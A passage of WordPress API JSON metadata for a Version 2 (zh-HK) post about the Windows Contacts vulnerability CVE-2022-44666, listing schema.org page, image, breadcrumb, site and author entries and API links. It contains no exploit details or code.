2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max","datePublished":"2023-07-19T06:31:28+00:00","dateModified":"2023-08-07T07:56:21+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage","url":"htt
ps:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/zh\/"},{"@type":"ListItem","position":2,"name":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 
2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/011bc7c3731c930bcfeecd52fefb6365","name":"tracylamv2","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g","caption":"tracylamv2"},"url":"https:\/\/version-2.com\/zh\/author\/tracylamv2\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-hXN","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/69055","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/149011790"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=69055"}],"version-history":[{"count":6,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/69055\/revisions"}],"predecessor-version":[{"id":69363,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/69055\/revisions\/69363"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=69055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=69055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=69055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\
/{rel}","templated":true}]}}